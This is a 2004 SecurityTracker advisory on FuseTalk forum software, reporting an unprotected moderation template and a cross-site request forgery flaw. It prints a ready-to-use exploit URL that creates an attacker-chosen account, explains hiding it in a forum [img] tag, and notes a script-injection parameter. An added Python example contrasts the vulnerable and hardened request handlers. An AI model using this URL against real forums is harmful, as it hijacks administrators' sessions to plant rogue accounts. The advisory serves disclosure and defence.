SecurityTracker.com
SecurityTracker Archives

Category:  Application (Forum/Board/Portal)  >  FuseTalk Vendors:  FuseTalk Inc.
FuseTalk Grants Remote Users Access to 'banning' Template
SecurityTracker Alert ID:  1010080
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  May 6 2004
Impact:  Disclosure of user information, Modification of user information
Exploit Included:  Yes  
Version(s): 4.0
Description:  An access control vulnerability was reported in FuseTalk. A remote user can access a moderation template without the required privileges, and an administration template accepts state-changing requests via HTTP GET.

Stuart Jamieson reported that unpatched releases of version 4.0 allow a remote user without administrative privileges to access the 'banning.cfm' moderation template and ban other users. The report notes that the administration templates are not affected by this flaw, only the moderation ones.

It is also reported that in version 2.0 (and possibly other versions) the 'adduser.cfm' administration template accepts its parameters from an HTTP GET request rather than requiring a POST. A remote user can therefore create a URL that, when loaded by the browser of an authenticated target administrator, causes a new account to be created with the attacker's chosen username and password (a cross-site request forgery). A demonstration exploit URL is provided:

http://[target]/admin/adduser.cfm?FTVAR_FIRSTNAMEFRM=God&FTVAR_LASTNAMEFRM=God&FTVAR_EMAILADDRESSFRM=Attacker@acker.com&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERFORUMSFRM=0&FTVAR_USERTYPEFRM=g&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70&FTVAR_COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RETURNERROR=Yes&FT_ACTION=adduser

The report indicates that this URL can be embedded in a forum post within an '[img]' image tag, so that when an authenticated target administrator views the post, the browser fetches the URL with the administrator's session and the account is created without any further action by the administrator. The report also notes that the 'FTVAR_SCRIPTRUN' parameter in the URL carries JavaScript ('self.close();'), so the same link could be used to run script in the browser of an administrative user who follows it, even if no account is created.
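The two flaws above, modelled as an added example that is not FuseTalk code: a request handler with the unpatched behaviour (no role check on the moderation template, URL and FORM parameters merged so a GET with the victim's session cookie is enough) next to a hardened handler that applies the fix the report implies (role check on every moderation or administration template, POST only for state changes, FORM scope only, and a per-session anti-forgery token). The Session and Request classes, the template paths, the 'ban' action with its FTVAR_BANUSERFRM parameter and the FTVAR_CSRFTOKEN parameter are assumptions made for the example; the other FTVAR_* names are taken from the advisory's demonstration URL.

```python
"""
Added example, not FuseTalk's code: a minimal model of the two flaws in
this advisory (an unprotected moderation template, and an administration
template that performs a state change from a GET request) next to the
hardened handler the report implies.  Session, Request, the template
paths, the 'ban' action, FTVAR_BANUSERFRM and FTVAR_CSRFTOKEN are
assumptions; the other FTVAR_* names come from the advisory's URL.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit


@dataclass
class Session:
    """Cookie-bound server session; the browser attaches it to every request."""
    username: str
    role: str                      # "user", "moderator" or "admin"
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    method: str                    # "GET" or "POST"
    path: str
    query: dict                    # URL scope (query string parameters)
    form: dict                     # FORM scope (POST body parameters)
    session: Session


RANK = {"user": 0, "moderator": 1, "admin": 2}
# Template paths are assumed; the advisory only names the .cfm files.
MIN_ROLE = {"/moderation/banning.cfm": "moderator",
            "/admin/adduser.cfm": "admin"}


def vulnerable_serve(req):
    """Unpatched behaviour: no role check on the template, URL and FORM
    scopes merged, so a GET carrying the victim's session cookie is enough."""
    params = {**req.query, **req.form}
    action = params.get("FT_ACTION")
    if action == "adduser":
        return ("ok", "created " + params["FTVAR_USERNAMEFRM"])
    if action == "ban":
        return ("ok", "banned " + params["FTVAR_BANUSERFRM"])
    return ("denied", "unknown action")


def hardened_serve(req):
    """Role check for every moderation/admin template, POST only for state
    changes, FORM scope only, and a per-session anti-forgery token."""
    needed = MIN_ROLE.get(req.path)
    if needed is None:
        return ("denied", "unknown template")
    if RANK[req.session.role] < RANK[needed]:
        return ("denied", "insufficient privileges")
    if req.method != "POST":
        return ("denied", "state-changing request must be POST")
    params = req.form               # never the URL scope
    token = params.get("FTVAR_CSRFTOKEN", "")
    if not hmac.compare_digest(token.encode(), req.session.csrf_token.encode()):
        return ("denied", "missing or wrong anti-forgery token")
    action = params.get("FT_ACTION")
    if action == "adduser":
        return ("ok", "created " + params["FTVAR_USERNAMEFRM"])
    if action == "ban":
        return ("ok", "banned " + params["FTVAR_BANUSERFRM"])
    return ("denied", "unknown action")


# The advisory's demonstration URL, trimmed to the parameters that matter.
ATTACK_URL = ("http://forum.example/admin/adduser.cfm?FTVAR_FIRSTNAMEFRM=God"
              "&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass"
              "&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERLEVELFRM=0"
              "&FT_ACTION=adduser")


def forged_request_from_img(url, victim_session):
    """What the victim's browser sends when it fetches an [img] whose src is
    the attack URL: a GET with only query parameters, no form body, and the
    victim's own session cookie attached automatically."""
    parts = urlsplit(url)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return Request("GET", parts.path, query, {}, victim_session)


if __name__ == "__main__":
    admin = Session("root", "admin")
    forged = forged_request_from_img(ATTACK_URL, admin)
    print(vulnerable_serve(forged))          # ('ok', 'created attacker')
    print(hardened_serve(forged))            # denied: must be POST
    legit = Request("POST", "/admin/adduser.cfm", {}, {
        "FT_ACTION": "adduser", "FTVAR_USERNAMEFRM": "newmod",
        "FTVAR_CSRFTOKEN": admin.csrf_token}, admin)
    print(hardened_serve(legit))             # ('ok', 'created newmod')
    # banning.cfm: an ordinary user reaches it unpatched, not when hardened.
    plain = Session("guest", "user")
    ban = Request("GET", "/moderation/banning.cfm",
                  {"FT_ACTION": "ban", "FTVAR_BANUSERFRM": "rival"}, {}, plain)
    print(vulnerable_serve(ban), hardened_serve(ban))
```

Requiring POST on its own is not a complete defence, since a hidden auto-submitting form on an attacker page can still POST with the victim's cookie; the per-session token is what actually stops the forgery, and the role check is what closes the separate banning.cfm flaw. Token comparison goes through hmac.compare_digest so a wrong token fails in constant time.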

Impact:  A remote user can access the 'banning.cfm' moderation template without the required privileges and ban other users. A remote user can also cause an authenticated administrator's browser to create a new account via the 'adduser.cfm' administration template.
Solution:  The report suggests that a patch is available from the vendor to correct the 'banning.cfm' access flaw.
Vendor URL:  www.fusetalk.com/
Cause:  Access control error
Underlying OS:  Linux (Any), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)
Reported By:  Stuart Jamieson <stuart.jamieson@active-outdoors.co.uk>
Message History:   None.


 Source Message Contents

Date:  5 May 2004 12:15:06 -0000
From:  Stuart Jamieson <stuart.jamieson@active-outdoors.co.uk>
Subject:  Fuse Talk Vulnerabilities

As well as well known XSS vulnerabilities, the latest version 4.0 seems to have some other issues.

Unpatched releases of V4.0 allow the user to access the template banning.cfm without any administrative privileges. All users of the software should check with fusetalk.com for the latest security patches to prevent this being misused. Access to this template allows any user to ban any other users and seems to be particularly vulnerable. Fortunately it does not affect the administration templates, merely the moderation ones, so the chances of an attacker gaining higher levels of access seem unlikely.

Another issue seems to exist which I have only so far tested on Version 2.0 and am unsure if this also occurs in V3-4: it appears that within the administration templates adduser.cfm allows parameters to be passed by a GET statement rather than a POST statement. This potential vulnerability could allow a hostile to create a new account by tricking some other person with moderator powers. Although it may seem obvious that a link to

http://www.victim.com/admin/adduser.cfm?FTVAR_FIRSTNAMEFRM=God&FTVAR_LASTNAMEFRM=God&FTVAR_EMAILADDRESSFRM=Attacker@acker.com&FTVAR_USERNAMEFRM=attacker&FTVAR_PASSWORDFRM=coolpass&FTVAR_PASSWORD2FRM=coolpass&FTVAR_USERFORUMSFRM=0&FTVAR_USERTYPEFRM=g&FTVAR_USERLEVELFRM=0&FTVAR_STATUSFRM=1&FTVAR_CITYFRM=&FTVAR_STATEFRM=70&FTVAR_COUNTRYFRM=36&FTVAR_SCRIPTRUN=self.close%28%29%3B&FTVAR_RETURNERROR=Yes&FT_ACTION=adduser

would create a new account, if the address is hidden within an image tag [img][/img] then the event will fire the creation of the account when the administrator's web browser attempts to download the image. This could be extended by the variable FTVAR_SCRIPTRUN=self.close which, even in not creating an account, would be capable of running malicious JavaScript when an administrative user attempted to follow the link. Since FuseTalk relies nearly entirely on POST based data, the best fix for this is to restrict posting of data by a GET statement.


Copyright 2004, SecurityGlobal.net LLC